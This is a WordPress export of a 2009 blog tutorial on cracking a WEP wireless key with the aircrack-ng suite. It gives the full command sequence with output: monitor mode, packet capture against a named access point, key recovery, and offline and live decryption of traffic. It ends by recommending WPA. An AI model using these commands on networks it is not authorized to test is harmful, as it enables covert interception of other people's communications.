{"id":370,"date":"2009-08-09T20:02:05","date_gmt":"2009-08-09T18:02:05","guid":{"rendered":"http:\/\/www.netexpertise.eu\/en\/?p=370"},"modified":"2021-10-13T21:52:58","modified_gmt":"2021-10-13T19:52:58","slug":"crack-wep-key-and-decrypt-live-traffic","status":"publish","type":"post","link":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","title":{"rendered":"How to crack a WEP key and decrypt live traffic"},"content":{"rendered":"\n

Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
 
All steps will be run under root super-user as interfaces state needs to be changed.
 <\/p>\n\n\n\n

Aircrack Installation<\/h2>\n\n\n\n

Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run<\/p>\n\n\n\n

apt-get install aircrack-ng<\/code><\/pre>\n\n\n\n
 
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
 
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.<\/p>\n\n\n\n
root@crack_WEP:~$ ifconfig\nlo        Interface doesn't support scanning.\n\nwlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e  \n          UP BROADCAST MULTICAST  MTU:1500  Metric:1\n          RX packets:22 errors:0 dropped:0 overruns:0 frame:0\n          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0\n          collisions:0 txqueuelen:1000 \n          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)<\/code><\/pre>\n\n\n\n

Capturing Packets<\/h2>\n\n\n\n
The interface needs to be switched to monitor mode in the first place.<\/p>\n\n\n\n
root@crack_WEP:~$ airmon-ng\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]<\/code><\/pre>\n\n\n\n
 
Airmon has detected the interface is wlan0. It could be a different name of course such as ath0 for instance.<\/p>\n\n\n\n
root@crack_WEP:~$ airmon-ng stop wlan0\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]\n\t\t\t\t(monitor mode disabled)\n\nroot@crack_WEP:~$ airmon-ng start wlan0\nInterface\tChipset\t\tDriver\nwlan0\t\tBroadcom 43xx\tb43 - [phy0]\n\t\t\t\t(monitor mode enabled on mon0)<\/code><\/pre>\n\n\n\n
 
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:<\/p>\n\n\n\n
root@crack_WEP:~$ iwconfig\nwlan0     IEEE 802.11bg  ESSID:\"\"  \n          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   \n          Tx-Power=27 dBm   \n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   \n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0\n\nmon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm   \n          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   \n          Encryption key:off\n          Power Management:off\n          Link Quality:0  Signal level:0  Noise level:0\n          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0\n          Tx excessive retries:0  Invalid misc:0   Missed beacon:0<\/code><\/pre>\n\n\n\n
 
We can now scan available networks around the place<\/p>\n\n\n\n
root@crack_WEP:~$ airodump-ng mon0\n CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01                                     \n BSSID              PWR  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private\n BSSID              STATION            PWR   Rate  Lost  Packets  Probes<\/code><\/pre>\n\n\n\n
 
Scan results show we’ve got an access point emitting on channel 1 with WEP encryption, that has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets broadcasted by access point and clients.<\/p>\n\n\n\n
root@crack_WEP:~$ airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0\n\n CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52                                         \n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH  MB  ENC  CIPHER AUTH ESSID\n 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private           \n BSSID              STATION            PWR   Rate  Lost  Packets  Probes                       \n 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795                               <\/code><\/pre>\n\n\n\n
 
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
 <\/p>\n\n\n\n
Cracking the WEP key<\/h2>\n\n\n\n
It is now time to crack the WEP key:<\/p>\n\n\n\n
root@crack_WEP:~$ aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap \n\n                                         Aircrack-ng 1.0 rc1\n\n                         [00:00:22] Tested 240228 keys (got 41742 IVs)\n\n   KB    depth   byte(vote)\n    0    0\/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640) \n    1    0\/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664) \n    2    0\/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176) \n    3    0\/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128) \n    4    0\/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616) \n    5    0\/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408) \n    6    0\/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152) \n    7    0\/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640) \n    8    0\/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104) \n    9    0\/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896) \n   10    0\/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896) \n   11    2\/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616) \n   12    0\/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) \n\n             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ] \n\tDecrypted correctly: 100%<\/code><\/pre>\n\n\n\n
 
That’s right, the key was cracked in 22 seconds!
 <\/p>\n\n\n\n
Decrypting Traffic<\/h2>\n\n\n\n
It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:<\/p>\n\n\n\n
root@crack_WEP:~$ airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap \nTotal number of packets read         22072\nTotal number of WEP data packets      6245\nTotal number of WPA data packets         0\nNumber of plaintext data packets         3\nNumber of decrypted WEP  packets      6245\nNumber of corrupted WEP  packets         0\nNumber of decrypted WPA  packets         0\n\nroot@crack_WEP:~$ tcpdump -r temp-01-dec.cap -i wlan<\/code><\/pre>\n\n\n\n
 
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.<\/p>\n\n\n\n
root@crack_WEP:~$ airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0\ncreated tap interface at0\nWEP encryption specified. Sending and receiving frames through mon0.\nFromDS bit set in all frames.<\/code><\/pre>\n\n\n\n
 
From another shell:<\/p>\n\n\n\n
crack_WEP:~$ tcpdump -i at0<\/code><\/pre>\n\n\n\n

Conclusion<\/h2>\n\n\n\n
It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA<\/a> with non-dictionnary based passwords.<\/p>\n","protected":false},"excerpt":{"rendered":"
Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point. All steps will be run under root super-user as interfaces state needs to be changed.  Aircrack Installation […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"categories":[11,32],"tags":[386,389,97],"yoast_head":"\nNetexpertise - How to crack a WEP key and decrypt live traffic<\/title>\n<meta name=\"description\" content=\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Netexpertise - How to crack a WEP key and decrypt live traffic\" \/>\n<meta property=\"og:description\" content=\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\" \/>\n<meta property=\"og:site_name\" content=\"Netexpertise\" \/>\n<meta property=\"article:published_time\" content=\"2009-08-09T18:02:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-13T19:52:58+00:00\" \/>\n<meta name=\"author\" content=\"dave\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@netexpertise\" \/>\n<meta name=\"twitter:site\" content=\"@netexpertise\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\",\"url\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\",\"name\":\"Netexpertise - How to crack a WEP key and decrypt live traffic\",\"isPartOf\":{\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#website\"},\"datePublished\":\"2009-08-09T18:02:05+00:00\",\"dateModified\":\"2021-10-13T19:52:58+00:00\",\"author\":{\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa\"},\"description\":\"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to\",\"breadcrumb\":{\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.netexpertise.eu\/en\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to crack a WEP key and decrypt live traffic\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#website\",\"url\":\"https:\/\/www.netexpertise.eu\/en\/\",\"name\":\"Netexpertise\",\"description\":\"Systems \/ Networks \/ DevOps\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.netexpertise.eu\/en\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa\",\"name\":\"dave\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/image\/\",\"url\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"contentUrl\":\"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g\",\"caption\":\"dave\"},\"sameAs\":[\"http:\/\/www.netexpertise.eu\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Netexpertise - How to crack a WEP key and decrypt live traffic","description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","og_locale":"en_US","og_type":"article","og_title":"Netexpertise - How to crack a WEP key and decrypt live traffic","og_description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to","og_url":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","og_site_name":"Netexpertise","article_published_time":"2009-08-09T18:02:05+00:00","article_modified_time":"2021-10-13T19:52:58+00:00","author":"dave","twitter_card":"summary_large_image","twitter_creator":"@netexpertise","twitter_site":"@netexpertise","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","url":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html","name":"Netexpertise - How to crack a WEP key and decrypt live traffic","isPartOf":{"@id":"https:\/\/www.netexpertise.eu\/en\/#website"},"datePublished":"2009-08-09T18:02:05+00:00","dateModified":"2021-10-13T19:52:58+00:00","author":{"@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa"},"description":"Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much... Here is how to","breadcrumb":{"@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/www.netexpertise.eu\/en\/systems\/linux\/crack-wep-key-and-decrypt-live-traffic.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.netexpertise.eu\/en"},{"@type":"ListItem","position":2,"name":"How to crack a WEP key and decrypt live traffic"}]},{"@type":"WebSite","@id":"https:\/\/www.netexpertise.eu\/en\/#website","url":"https:\/\/www.netexpertise.eu\/en\/","name":"Netexpertise","description":"Systems \/ Networks \/ DevOps","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.netexpertise.eu\/en\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/cb4cd666549d22e9070ec1cfc1a496fa","name":"dave","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.netexpertise.eu\/en\/#\/schema\/person\/image\/","url":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","contentUrl":"http:\/\/1.gravatar.com\/avatar\/1129916e1f4955bd632f27f836f64e55?s=96&d=mm&r=g","caption":"dave"},"sameAs":["http:\/\/www.netexpertise.eu"]}]}},"_links":{"self":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts\/370"}],"collection":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/comments?post=370"}],"version-history":[{"count":0,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/posts\/370\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/media?parent=370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/categories?post=370"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.netexpertise.eu\/en\/wp-json\/wp\/v2\/tags?post=370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}